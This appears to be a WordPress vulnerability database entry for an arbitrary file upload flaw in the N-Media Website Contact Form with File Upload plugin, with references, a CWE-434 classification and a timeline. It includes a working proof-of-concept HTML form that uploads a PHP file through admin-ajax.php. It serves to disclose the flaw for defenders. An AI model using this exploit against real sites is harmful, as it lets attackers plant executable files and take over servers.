N-Media Website Contact Form with File Upload - Arbitrary File Upload



Proof of Concept
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="nm_webcontact_upload_file" />
<input type="hidden" name="name" value="upload.php" />
<input type="file" name="file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Affects Plugin

References

URL https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-website-contact-form-with-file-upload/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Claude Godlewski
Views 4490
Verified No
WPVDB ID 8623

Timeline

Publicly Published 2016-09-19 (almost 3 years ago)
Added 2016-09-21 (almost 3 years ago)
Last Updated 2017-10-30 (almost 2 years ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin